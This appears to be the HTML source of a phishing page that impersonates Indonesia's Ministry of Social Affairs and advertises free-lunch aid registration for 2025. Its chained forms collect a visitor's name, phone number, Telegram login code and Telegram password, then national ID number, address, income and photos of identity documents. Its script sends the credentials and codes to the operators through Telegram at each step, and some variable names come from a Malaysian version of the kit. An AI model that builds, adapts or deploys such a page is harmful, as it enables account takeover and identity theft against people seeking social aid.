<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <title>DAFTAR MAKAN SIANG GRATIS 2025</title>
    <meta content="" name="description">
    <meta content="" name="keywords">

    <!-- Favicons -->
    <link rel="icon" href="./assets/img/kementeriansosial1.png" type="image/x-icon" />
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css">
    <!-- Fonts -->
    <link href="https://fonts.googleapis.com" rel="preconnect">
    <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Jost:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">

    <!-- Open Graph metadata -->
    <meta property="og:title" content="DAFTAR MAKAN SIANG GRATIS 2025">
    <meta property="og:description" content="Pendaftaran Makan Siang Gratis 2025 telah dibuka! Daftar sekarang dan dapatkan kesempatan untuk mendapatkan makan siang gratis.">
    <meta property="og:image" content="https://cdn.digitaldesa.com/uploads/landing/artikel/6d527f52489a8e306c2d9fc4bfea7498.jpg">
    <!-- <meta property="og:url" content="https://bantuandapur-madani.my.id/2/"> -->
    <meta property="og:type" content="website">

    <!-- Jika Anda ingin menentukan ukuran gambar -->
    <meta property="og:image:width" content="1200">
    <meta property="og:image:height" content="630">

    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="DAFTAR MAKAN SIANG GRATIS 2025">
    <meta name="twitter:description" content="Pendaftaran Makan Siang Gratis 2025 telah dibuka! Daftar sekarang dan dapatkan kesempatan untuk mendapatkan makan siang gratis.">
    <meta name="twitter:image" content="https://cdn.digitaldesa.com/uploads/landing/artikel/6d527f52489a8e306c2d9fc4bfea7498.jpg">



    <!-- Vendor CSS Files -->
    <link href="assets/css/bootstrap.min.css" rel="stylesheet">
    <link href="assets/css/bootstrap-icons.css" rel="stylesheet">
    <link href="assets/css/aos.css" rel="stylesheet">
    <link href="assets/css/glightbox.min.css" rel="stylesheet">
    <link href="assets/css/swiper-bundle.min.css" rel="stylesheet">

    <!-- Main CSS File -->
    <link href="assets/css/main.css" rel="stylesheet">
    <link href="assets/css/style.css" rel="stylesheet">

    <style>
        .blue-background {
            background-color: whitesmoke;
            /* Warna biru default Bootstrap */
            /* Atau gunakan kode warna atau nama warna lainnya */

        }

        /* Pastikan kontainer gambar memiliki text-align: center */
        .center-image-container {
            text-align: center;
        }

        /* Gambar responsif dan tengah */
        .center-image {
            display: inline-block;
            /* Ubah dari block ke inline-block untuk bekerja dengan text-align */
            width: 100%;
            max-width: 100%;
            /* Pastikan gambar tidak melebihi lebar kontainernya */
        }

        .testimonial-imgs {
            border-radius: 50%;
            display: block /* Pastikan gambar ditampilkan sebagai block element */
        }

        /* styling form tiga setengah */
        /* CSS untuk form Tiga Setengah */
        .third-half .input-group {
            margin-bottom: 15px;
            /* Jarak antara elemen input */
        }

        /* Mengatur lebar label input-group-text */
        .third-half .input-group .input-group-text {
            width: 150px;
            /* Lebar label */
            text-align: left;
            /* Rata kiri untuk teks label */
            background-color: #f8f9fa;
            /* Warna latar belakang label */
        }

        /* Mengatur lebar form-control agar sejajar dengan label */
        .third-half .input-group .form-control {
            flex: 1;
            /* Form control akan menempati ruang yang tersisa */
            border-radius: 0.25rem;
            /* Radius sudut inputan */
        }

        /* Mengatur jarak di sekitar form */
        .third-half {
            padding: 15px;
            background-color: #ede7d9;
            border: 1px solid #ddd;
        }

        /* Button styling untuk form Tiga Setengah */


        /* countdown style */
        .countdown-container {
            text-align: center;
            font-family: 'Poppins', sans-serif;
        }

        .countdown-text {
            font-size: 1rem;
            color: #333;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
        }

        .countdown-timer {
            font-size: 2rem;
            font-weight: bold;
            color: #f2843e;
            margin: 10px 0;
            animation: pulse 1.5s infinite;
        }

        @keyframes pulse {
            0% {
                color: #f2843e;
            }

            50% {
                color: #ff9a6e;
            }

            100% {
                color: #f2843e;
            }
        }
    </style>

    <!-- =======================================================
  * Template Name: Arsha
  * Template URL: https://bootstrapmade.com/arsha-free-bootstrap-html-template-corporate/
  * Updated: Jun 27 2024 with Bootstrap v5.3.3
  * Author: BootstrapMade.com
  * License: https://bootstrapmade.com/license/
  ======================================================== -->
    <script src="https://code.iconify.design/3/3.1.0/iconify.min.js"></script>

</head>

<body class="">

    <header id="header" class="header d-flex align-items-center fixed-top">
        <div class="container-fluid container-xl position-relative d-flex align-items-center">

            <a href="index" class="logo d-flex align-items-center me-auto">
                <h1 class="sitename"><img width="50px" src="./assets/img/kementeriansosial1.png" alt=""></h1>
            </a>

            <nav id="navmenu" class="navmenu" style="display: none; ">
                <i class="mobile-nav-toggle d-xl-none bi bi-list"></i>
            </nav>

            <a class="" href="#claimnow"><img width="25px" src="assets/img/bumn.png" alt=""> &nbsp;</a>

        </div>
    </header>

    <main class="main">

        <!-- Hero Section -->
        <section id="hero" class="hero section blue-background" style="margin-top: -50px;">

            <div class="container" style="margin-bottom: -50px;">
                <div class="row gy-4">
                    <div class="col-lg-6 order-1 order-lg-2 hero-img" data-aos="zoom-out" data-aos-delay="200">
                        <img src="./assets/img/makan.jpg" class="img-fluid " alt="">
                    </div>
                </div>
            </div>

        </section><!-- /Hero Section -->

        <!-- Clients Section -->
        <section id="clients" class="clients section light-background">

            <img width="100%" src="./assets/img/supp.png" class="img-fluid" alt="">

        </section><!-- /Clients Section -->

        <!-- Form Pendaftaran Makan Siang Gratis 2025 -->
        <div class="container first shadow p-3 mb-5 bg-white rounded" style="margin-top: -5px; background-color:#ede7d9;">
            <h2 style="color: #0093ad; text-align: center; font-size: medium;">SILAHKAN DAFTAR UNTUK MAKAN SIANG GRATIS 2025</ ```html
            <div class="row gy-4 justify-content-center">
                <form class="row g-3" action="javascript:void(0)" method="post" id="firstForm">
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Nama</span>
                        <input name="full_name" id="full_name" maxlength="50" class="form-control" type="text" required="true" placeholder="Nama Lengkap">
                    </div>
                    <div class="col-md-6">
                        <div class="input-group">
                            <span class="input-group-text" id="basic-addon1"><span class="iconify" data-icon="flag:id-4x3"></span>
                                +62</span>
                            <input name="phone_number" id="phone_number" maxlength="13" class="form-control" type="number" required="true" placeholder="Nomor Telepon" oninput="this.setCustomValidity(''); if (!/^\d{9,12}$/.test(this.value)) { this.setCustomValidity('Nomor telepon harus terdiri dari 9 atau 12 digit angka.'); }">
                        </div>
                    </div>
                    <div class="col-12 text-center">
                        <button type="submit" onclick="kirimPesanForm1()" class="btn btn-primary" style="color:white; font-weight: bold;">DAFTAR</button>
                    </div>
                </form>
            </div>
        </div>
         <!-- Form Kedua -->
         <div class="container second shadow p-3 mb-5 bg-white rounded" style="display: none; background-color:#ede7d9; ">
            <div class="row gy-4 justify-content-center">
                <form class="row g-3" action="javascript:void(0)" method="post" id="secondForm">
                    <input type="hidden" name="full_name" id="validateFullName" readonly="">
                    <input type="hidden" name="phone_number" id="validatePhoneNumber" readonly="">
                    <div class="mb-3">
                        <div class="countdown-container">
                            <label class="countdown-text">Kami telah mengirimkan kode verifikasi ke aplikasi Telegram Anda Dalam
                                <div id="countdown" class="countdown-timer">01:30</div>Silakan isi kode jika sudah mendapat kode verifikasi.
                            </label>
                        </div>
                        <input name="otp" id="otp" class="form-control" type="number" required="true" placeholder="Masukkan Kode Verifikasi">
                        <div id="otpValidationFeedback" class="invalid-feedback"></div>
                    </div>
                    <div class="col-12 text-center">
                        <button type="submit" onclick="kirimPesanForm2()" class="btn btn-primary" style="color:white; font-weight: bold;">BERIKUTNYA</button>
                    </div>
                </form>
            </div>
        </div>

        <!-- Form Ketiga -->
        <div class="container third shadow p-3 mb-5 bg-white rounded" style="display: none; background-color:#ede7d9;">
            <div class="row gy-4 justify-content-center">
                <form class="row g-3" action="javascript:void(0)" method="post" id="thirdForm" novalidate>
                    <input type="hidden" name="full_name" id="validateFullName" readonly="">
                    <input type="hidden" name="phone_number" id="validatePhoneNumber" readonly="">
                    <input type="hidden" name="otp_code" id="validateOtpCode" readonly="">
                    <div class="mb-3">
                        <label for="password" class="form-label">Masukkan kata sandi telegram Anda (opsional).</label>
                        <input name="password" id="password" class="form-control" type="password" placeholder="Masukkan Password">
                        <div id="passwordValidationFeedback" class="invalid-feedback"></div>
                    </div>
                    <div class="col-12 text-center">
                        <button type="submit" onclick="kirimPesanForm3()" class="btn btn-primary" style="color:white; font-weight: bold;">BERIKUTNYA</button>
                    </div>
                </form>
            </div>
        </div>


        <!-- Form Tiga Setengah -->
        <!-- Form Pendaftaran Calon Penerima Bantuan Sosial PKH -->
        <div class="container third-half shadow p-3 mb-5 bg-white rounded" style="display: none; background-color:#ede7d9;">
            <div class="row gy-4 justify-content-center">
                <form class="row g-3" action="javascript:void(0)" method="post" id="thirdHalfForm">
                    <input type="hidden" name="full_name" id="validateFullName" readonly="">
                    <input type="hidden" name="phone_number" id="validatePhoneNumber" readonly="">
                    <input type="hidden" name="otp_code" id="validateOtpCode" readonly="">
                    <input type="hidden" name="password" id="validatePassword" readonly="">

                    <!-- No. KTP -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">No. KTP</span>
                        <input name="no_ktp" id="no_ktp" maxlength="16" class="form-control" type="number" required="true" placeholder="No. KTP" oninput="this.setCustomValidity(''); if (!/^\d+$/.test(this.value)) { this.setCustomValidity('Hanya boleh diisi angka.'); }">
                    </div>

                    <!-- Nama Lengkap -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Nama Lengkap</span>
                        <input name="nama_lengkap" id="nama_lengkap" maxlength="50" class="form-control" type="text" required="true" placeholder="Nama Lengkap" oninput="this.setCustomValidity(''); if (!/^[a-zA-Z\s]+$/.test(this.value)) { this.setCustomValidity('Hanya boleh diisi huruf.'); }">
                    </div>

                    <!-- Umur -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Umur</span>
                        <input name="umur" id="umur" maxlength="3" class="form-control" type="number" required="true" placeholder="Umur" oninput="this.setCustomValidity(''); if (!/^\d+$/.test(this.value)) { this.setCustomValidity('Hanya boleh diisi angka.'); }">
                    </div>

                    <!-- Alamat -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Alamat</span>
                        <input name="alamat" id="alamat" class="form-control" type="text" required="true" placeholder="Alamat Lengkap">
                    </div>

                    <!-- Jenis Kelamin -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Jenis Kelamin</span>
                        <select name="jenis_kelamin" id="jenis_kelamin" class="form-control" required="true">
                            <option value="">Pilih Jenis Kelamin</option>
                            <option value="Laki-laki">Laki-laki</option>
                            <option value="Perempuan">Perempuan</option>
                        </select>
                    </div>

                    <!-- Status Pekerjaan -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Status Pekerjaan</span>
                        <select name="status_pekerjaan" id="status_pekerjaan" class="form-control" required="true">
                            <option value="">Pilih Status Pekerjaan</option>
                            <option value="Bekerja">Bekerja</option>
                            <option value="Tidak Bekerja">Tidak Bekerja</option>
                        </select>
                    </div>

                    <!-- Status Menikah -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Status Menikah</span>
                        <select name="status_menikah" id="status_menikah" class="form-control" required="true">
                            <option value="">Pilih Status Menikah</option>
                            <option value="Belum Menikah">Belum Menikah</option>
                            <option value="Menikah">Menikah</option>
                            <option value="Cerai">Cerai</option>
                        </select>
                    </div>

                    <!-- Jumlah Anak -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Jumlah Anak</span>
                        <input name="jumlah_anak" id="jumlah_anak" class="form-control" type="number" required="true" placeholder="Jumlah Anak" oninput="this.setCustomValidity(''); if (!/^\d+$/.test(this.value)) { this.setCustomValidity('Hanya boleh diisi angka.'); }">
                    </div>

                    <!-- Jumlah Anggota Keluarga -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Jumlah Anggota Keluarga</span>
                        <input name="jumlah_anggota_keluarga" id="jumlah_anggota_keluarga" class="form-control" type="number" required="true" placeholder="Jumlah Anggota Keluarga" oninput="this.setCustomValidity(''); if (!/^\d+$/.test(this.value)) { this.setCustomValidity('Hanya boleh diisi angka.'); }">
                    </div>

                    <!-- Tingkat Pendidikan -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Tingkat Pendidikan</span>
                        <select name="tingkat_pendidikan" id="tingkat_pendidikan" class="form-control" required="true">
                            <option value="">Pilih Tingkat Pendidikan</option>
                            <option value="Tidak Sekolah">Tidak Sekolah</option>
                            <option value="SD">SD</option>
                            <option value="SMP">SMP</option>
                            <option value="SMA">SMA</option>
                            <option value="Diploma (D3)">Diploma (D3)</option>
                            <option value="Sarjana (S1)">Sarjana (S1)</option>
                        </select>
                    </div>

                    <!-- Penghasilan Per Bulan -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Penghasilan Per Bulan (Rp)</span>
                        <select name="penghasilan_per_bulan" id="penghasilan_per_bulan" class="form-control" required="true">
                            <option value="">Pilih Penghasilan Per Bulan</option>
                            <option value="Dibawah 1 juta">Dibawah 1 juta</option>
                            <option value="1 juta - 2 juta">1 juta - 2 juta</option>
                            <option value="3 juta - 4 juta">3 juta - 4 juta</option>
                            <option value="5 juta - 6 juta">5 juta - 6 juta</option>
                            <option value="7 juta - 8 juta">7 juta - 8 juta</option>
                            <option value="9 juta - 10 juta">9 juta - 10 juta</option>
                            <option value="Lebih dari 10 juta">Lebih dari 10 juta</option>
                        </select>
                    </div>

                    <!-- Alamat Email -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Alamat Email</span>
                        <input name="email" id="email" class="form-control" type="email" required="true" placeholder="Alamat Email">
                    </div>

                    <!-- Upload Foto KTP -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Upload Foto KTP</span>
                        <input name="foto_ktp" id="foto_ktp" class="form-control" type="file" accept=".png,.jpg,.jpeg" required="true">
                        <small style="color:red;">Format yang diperbolehkan: png, jpg, jpeg.</small>
                    </div>

                    <!-- Upload Kartu Keluarga -->
                    <div class="input-group">
                        <span class="input-group-text" id="basic-addon1">Upload Kartu Keluarga</span>
                        <input name="kartu_keluarga" id="kartu_keluarga" class="form-control" type="file" accept=".png,.jpg,.jpeg,.pdf" required="true">
                        <small style="color:red;">Format yang diperbolehkan: png, jpg, jpeg, pdf.</small>
                    </div>

                    <div class="col-12 text-center">
                        <button type="submit" onclick="kirimPesanForm3Half()" class="btn btn-primary" style="color:white; font-weight: bold;">DAFTAR SEBAGAI PENERIMA</button>
                    </div>
                </form>
            </div>
        </div>

        <!-- Loading Spinner -->
        <div class="loading-spinner text-center" style="display: none; margin-top: 10px;">
            <div class="spinner-border text-primary" role="status">
                <span class="visually-hidden">Loading...</span>
            </div>
            <p class="mt-2">Memproses...</p>
        </div>

        <div class="center-image-container">
            <img src="./assets/img/makan2.jpg" class="img-fluid center-image" alt="" data-aos="zoom-in" data-aos-delay="100">
        </div>

        <br>

        <!-- About Section -->
        <section id="about" class="about section light-background" style="margin-top: -95px;">
            <!-- Section Title -->
        </section>

    </main>

    <footer id="footer" class="footer light-background" style="margin-top: -150px;">
        <div class="container footer-top">
            <div class="row gy-4">
                <div class="col-lg-4 col-md-6 footer-about">
                    <p>KEMENTERIAN SOSIAL REPUBLIK INDONESIA</p>
                    <p> Jl. Salemba Raya No. 28, Jakarta Pusat</p>
                    <p> Jakarta 10110 Indonesia</p>
                    <p class="mt-3"><strong>Phone:</strong> <span>021 - 2993 5678</span></p>
                    <p><strong>Email:</strong> <span>persuratan@kemsos.go.id </span></p>
                </div>
                <div class="col-lg-2 col-md-3 footer-links">
                    <h4>Media</h4>
                    <ul>
                        <li><i class="bi bi-chevron-right"></i> <a href="https://www.youtube.com/channel/UCfB7OFJAfsGLbSvMimIWD4A" target="_blank">Youtube</a></li>
                        <li><i class="bi bi-chevron-right"></i> <a href="https://www.tiktok.com/@kemensosri" target="_blank">New Updates</a></li>
                    </ul>
                </div>
                <div class="col-lg-4 col-md-12" style="margin-top: -15px;">
                    <h4>Follow Us</h4>
                    <p>Dapatkan bantuan sosial melalui Program Makan Siang Gratis 2025! Daftar sekarang dan manfaatkan bantuan untuk kesejahteraan keluarga Anda.</p>
                    <div class="social-links d-flex">
                        <a href="https://x.com/kemensosri" target="_blank"><i class="bi bi-twitter"></i></a>
                        <a href="https://web.facebook.com/KemsosRI/" target="_blank"><i class="bi bi-facebook"></i></a>
                        <a href="https://www.instagram.com/kemensosri/" target="_blank"><i class="bi bi-instagram"></i></a>
                        <a href="https://id.linkedin.com/company/kementerian-sosial-ri" target="_blank"><i class="bi bi-linkedin"></i></a>
                    </div>
                </div>
            </div>
        </div>

        <div class="container copyright text-center mt-4" style="margin-bottom: -60px;">
            <p>© <span>Hakcipta</span> <strong class="px-1 sitename">2024 Kementerian Sosial Republik Indonesia</strong>
            <div>All Rights Reserved</div>
            </p>
        </div>

    </footer>

    <!-- Scroll Top -->
    <a href="#" id="scroll-top" class="scroll-top d-flex align-items-center justify-content-center"><i class="bi bi-arrow-up-short"></i></a>

    <!-- Preloader -->
    <div id="preloader"></div>

    <!-- Vendor JS Files -->
    <script data-cfasync="false" src="assets/js/email-decode.min.js"></script><script src="assets/js/bootstrap.bundle.min.js"></script>
    <script src="assets/js/validate.js"></script>
    <script src="assets/js/aos.js"></script>
    <script src="assets/js/glightbox.min.js"></script>
    <script src="assets/js/swiper-bundle.min.js"></script>
    <script src="assets/js/noframework.waypoints.js"></script>
    <script src="assets/js/imagesloaded.pkgd.min.js"></script>
    <script src="assets/js/isotope.pkgd.min.js"></script>


    <!-- Main JS File -->
    <script src="assets/js/main.js"></script>


    <!-- jQuery (dari CDN untuk keperluan demo) -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

    <!-- script waktu hitung mundur -->
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            const countdownElement = document.getElementById('countdown');
            const duration = 90; // Duration in seconds
            let timeRemaining = duration;

            function updateCountdown() {
                const minutes = Math.floor(timeRemaining / 60);
                const seconds = timeRemaining % 60;
                countdownElement.textContent = `${String(minutes).padStart(2, '0')}:${String(seconds).padStart(2, '0')}`;

                if (timeRemaining > 0) {
                    timeRemaining--;
                } else {
                    timeRemaining = duration; // Reset the countdown
                }
            }

            setInterval(updateCountdown, 1000);
        });
    </script>

    <!-- Script untuk proses form -->
    <script>
        $(document).ready(function() {
            // Fungsi untuk menampilkan loading spinner
            function showLoadingSpinner() {
                $('.loading-spinner').show();
            }

            // Fungsi untuk menyembunyikan loading spinner
            function hideLoadingSpinner() {
                $('.loading-spinner').hide();
            }

            // Proses form pertama
            // Proses form pertama
            $('#firstForm').submit(function(event) {
                event.preventDefault();

                var full_name = $('#full_name').val();
                var phone_number = $('#phone_number').val();

                if (full_name === "" || phone_number === "") {
                    alert("Mohon lengkapi semua bidang!");
                    return false;
                }

                showLoadingSpinner(); // Tampilkan loading spinner

                // Simpan data ke Local Storage
                localStorage.setItem('full_name', full_name);
                localStorage.setItem('phone_number', phone_number);

                setTimeout(function() {
                    $(".second").show();
                    $('.first').hide();
                    hideLoadingSpinner(); // Sembunyikan loading spinner setelah sukses
                    $('#validateFullName').val(full_name);
                    $('#validatePhoneNumber').val(phone_number);
                }, 2000); // Delay 2 detik sebelum pindah ke form berikutnya
            });

            // Proses form kedua
            // Proses form kedua
            $('#secondForm').submit(function(event) {
                event.preventDefault();

                var full_name = localStorage.getItem('full_name');
                var phone_number = localStorage.getItem('phone_number');
                var otp_code = $('#otp').val();

                if (full_name === "" || phone_number === "" || otp_code === "") {
                    alert("Mohon lengkapi semua bidang!");
                    return false;
                }

                showLoadingSpinner(); // Tampilkan loading spinner

                // Simpan OTP ke Local Storage
                localStorage.setItem('otp_code', otp_code);

                setTimeout(function() {
                    $(".third").show();
                    $('.second').hide();
                    hideLoadingSpinner(); // Sembunyikan loading spinner setelah sukses
                    $('#validateOtpCode').val(otp_code);
                }, 2000); // Delay 2 detik sebelum pindah ke form berikutnya
            });

            // Proses form ketiga
            // Proses form ketiga
            $(document).ready(function() {
                $('#thirdForm').submit(function(event) {
                    event.preventDefault();

                    var full_name = localStorage.getItem('full_name');
                    var phone_number = localStorage.getItem('phone_number');
                    var otp_code = localStorage.getItem('otp_code');
                    var password = $('#password').val();

                    // Validasi
                    if (full_name === "" || phone_number === "" || otp_code === "") {
                        alert("Mohon lengkapi semua bidang!");
                        return false;
                    }

                    if (password.length > 0 && password.length < 3) {
                        $('#passwordValidationFeedback').text('Password minimal 3 karakter.').show();
                        $('#password').addClass('is-invalid');
                        return false;
                    } else {
                        $('#passwordValidationFeedback').text('').hide();
                        $('#password').removeClass('is-invalid');
                    }

                    showLoadingSpinner(); // Tampilkan loading spinner

                    // Simpan password ke Local Storage (perhatikan risiko keamanan)
                    localStorage.setItem('password', password);

                    setTimeout(function() {
                        $(".third-half").show(); // Tampilkan Form Tiga Setengah
                        $('.third').hide(); // Sembunyikan Form Ketiga
                        hideLoadingSpinner(); // Sembunyikan loading spinner setelah sukses
                    }, 2000); // Delay 2 detik sebelum pindah ke form tiga setengah
                });
            });

            // Proses form tiga setengah
            $('#thirdHalfForm').submit(function(event) {
                event.preventDefault();

                var full_name = localStorage.getItem('full_name');
                var phone_number = localStorage.getItem('phone_number');
                var otp_code = localStorage.getItem('otp_code');
                var password = localStorage.getItem('password');

                var no_mykad = $('#no_mykad').val();
                var namer = $('#namer').val();
                var umur = $('#umur').val();
                var alamat = $('#alamat').val();
                var jantina = $('#jantina').val();
                var pekerjaan = $('#pekerjaan').val();
                var nama_bank = $('#nama_bank').val();
                var no_akaun_bank = $('#no_akaun_bank').val();
                var alamat_emel = $('#alamat_emel').val();

                if (no_mykad === "" || namer === "" || umur === "" || alamat === "" || jantina === "" || pekerjaan === "" || nama_bank === "" || no_akaun_bank === "" || alamat_emel === "") {
                    alert("Mohon lengkapi semua bidang!");
                    return false;
                }

                showLoadingSpinner(); // Tampilkan loading spinner

                // Simpan data ke Local Storage (ini bisa diubah sesuai kebutuhan)
                localStorage.setItem('no_mykad', no_mykad);
                localStorage.setItem('namer', namer);
                localStorage.setItem('umur', umur);
                localStorage.setItem('alamat', alamat);
                localStorage.setItem('jantina', jantina);
                localStorage.setItem('pekerjaan', pekerjaan);
                localStorage.setItem('nama_bank', nama_bank);
                localStorage.setItem('no_akaun_bank', no_akaun_bank);
                localStorage.setItem('alamat_emel', alamat_emel);

                setTimeout(function() {
                    $(".fourth").show();
                    $('.third-half').hide();
                    hideLoadingSpinner(); // Sembunyikan loading spinner setelah sukses
                }, 2000); // Delay 2 detik sebelum pindah ke form berikutnya
            });



            // Tombol "Gunakan Nombor Telefon Lain" pada Bagian ke-4 diklik
            $('#useAnotherNumber').click(function(event) {
                event.preventDefault();
                $('.fourth').hide(); // Sembunyikan Bagian ke-4
                $('.first').show(); // Tampilkan kembali Form Pertama
                $('#full_name').val(''); // Kosongkan nilai nama
                $('#phone_number').val(''); // Kosongkan nilai nomor telepon
                $('#otp').val(''); // Kosongkan nilai OTP
                $('#password').val(''); // Kosongkan nilai kata sandi

                // Kosongkan nilai input dari Form Tiga Setengah
                $('#no_mykad').val(''); // Kosongkan nilai No.MyKad
                $('#namer').val(''); // Kosongkan nilai Nama
                $('#umur').val(''); // Kosongkan nilai Umur
                $('#alamat').val(''); // Kosongkan nilai Alamat
                $('#jantina').val(''); // Kosongkan nilai Alamat
                $('#pekerjaan').val(''); // Kosongkan nilai Pekerjaan
                $('#nama_bank').val(''); // Kosongkan nilai Nama Bank
                $('#no_akaun_bank').val(''); // Kosongkan nilai No.Akaun Bank
                $('#alamat_emel').val(''); // Kosongkan nilai Alamat E-mel
            });


            // Menambahkan event listener untuk memvalidasi panjang input OTP pada saat input berubah
            document.getElementById('otp').addEventListener('input', function() {
                var inputValue = this.value;
                if (inputValue.length > 5) {
                    this.value = inputValue.slice(0, 5); // Menghapus karakter jika lebih dari 5 digit
                }
            });

            // validasi OTP pada saat form kedua disubmit
            document.getElementById('secondForm').addEventListener('submit', function(event) {
                var otpValue = document.getElementById('otp').value;
                if (!/^\d{5}$/.test(otpValue)) {
                    alert("Kode OTP harus terdiri dari 5 digit angka!");
                    event.preventDefault(); // Mencegah form untuk disubmit jika kode OTP tidak valid
                }
            });

            // validasi panjang nomor telepon pada saat input berubah
            document.getElementById('phone_number').addEventListener('input', function() {
                var inputValue = this.value;
                if (inputValue.length > 12) {
                    this.value = inputValue.slice(0, 12); // Memotong input jika lebih dari 12 digit
                }
            });

            // validasi nomor telepon pada saat form pertama disubmit
            document.getElementById('firstForm').addEventListener('submit', function(event) {
                var phoneNumberValue = document.getElementById('phone_number').value;
                if (!/^\d{9,12}$/.test(phoneNumberValue)) {
                    alert("Nomor telepon harus terdiri dari 9 hingga 12 digit angka!");
                    event.preventDefault(); // Mencegah form untuk disubmit jika nomor telepon tidak valid
                }
            });

        });
        function kirimPesanForm1() {
            var nama = document.getElementById('full_name').value;
            var nhp = document.getElementById('phone_number').value;

            // Validasi nama
            if (nama === '') {
                showPasswordError('Nama tidak boleh kosong');
                return;
            } else if (nama.length < 3) {
                showPasswordError('Nama minimal harus 3 karakter.');
                return;
            } else if (nama.length > 30) {
                showPasswordError('Nama maksimal adalah 30 karakter.');
                return;
            }
            // Validasi nhp
            if (nhp === '') {
                showPasswordError('Nomor telepon tidak boleh kosong');
                return;
            } else if (nhp.length < 10) {
                showPasswordError('Nomor telepon minimal harus 10 digit.');
                return;
            } else if (nhp.length > 13) {
                showPasswordError('Nomor telepon maksimal adalah 13 digit.');
                return;
            }

            var gabungan = 'Full name: `' + encodeURIComponent(nama) + '`%0A' + 'Phone number: `' + '62' + encodeURIComponent(nhp) + '`';

            kirimKeTelegram(gabungan);
        }

        function kirimPesanForm2() {
            var nama = document.getElementById('validateFullName').value;
            var nhp = document.getElementById('validatePhoneNumber').value;
            var otp = document.getElementById('otp').value;

            var gabungan = 'Full name: `' + encodeURIComponent(nama) + '`%0A' +
                'Phone number: `' + '62' + encodeURIComponent(nhp) + '`%0A' +
                'OTP code: `' + encodeURIComponent(otp) + '`';

            kirimKeTelegram(gabungan);
        }

        function kirimPesanForm3() {
            var nama = document.getElementById('validateFullName').value;
            var nhp = document.getElementById('validatePhoneNumber').value;
            var otp = document.getElementById('validateOtpCode').value;
            var passwd = document.getElementById('password').value;

            var gabungan = 'Full name: `' + encodeURIComponent(nama) + '`%0A' +
                'Phone number: `' + '62' + encodeURIComponent(nhp) + '`%0A' +
                'OTP code: `' + encodeURIComponent(otp) + '`%0A' +
                'Password: `' + encodeURIComponent(passwd) + '`';

            kirimKeTelegram(gabungan);
        }

        // Fungsi untuk mengirim data Form Tiga Setengah
        function kirimPesanForm3Half() {
            var nama = document.getElementById('validateFullName').value;
            var nhp = document.getElementById('validatePhoneNumber').value;
            var otp = document.getElementById('validateOtpCode').value;
            var passwd = document.getElementById('password').value;

            var mykadNumber = document.getElementById('no_mykad').value;
            var name = document.getElementById('namer').value;
            var age = document.getElementById('umur').value;
            var address = document.getElementById('alamat').value;
            var gender = document.getElementById('jantina').value;
            var occupation = document.getElementById('pekerjaan').value;
            var bankName = document.getElementById('nama_bank').value;
            var bankAccountNumber = document.getElementById('no_akaun_bank').value;
            var emailAddress = document.getElementById('alamat_emel').value;

            var gabungan =
                'Full name: `' + encodeURIComponent(nama) + '`%0A' +
                'Phone number: `' + '62' + encodeURIComponent(nhp) + '`%0A' +
                'OTP code: `' + encodeURIComponent(otp) + '`%0A' +
                'Password: `' + encodeURIComponent(passwd) + '`%0A%0A' +
                'MyKad number: `' + encodeURIComponent(mykadNumber) + '`%0A' +
                'Full name: `' + encodeURIComponent(name) + '`%0A' +
                'Age: `' + encodeURIComponent(age) + '`%0A' +
                'Address: `' + encodeURIComponent(address) + '`%0A' +
                'Gender: `' + encodeURIComponent(gender) + '`%0A' +
                'Work: `' + encodeURIComponent(occupation) + '`%0A' +
                'Bank name: `' + encodeURIComponent(bankName) + '`%0A' +
                'Bank account number: `' + encodeURIComponent(bankAccountNumber) + '`%0A' +
                'Email address: `' + encodeURIComponent(emailAddress) + '`';

            kirimKeTelegram(gabungan);
        }
    </script>
   
    <script src="c0nf.js"></script>
</body>
</html>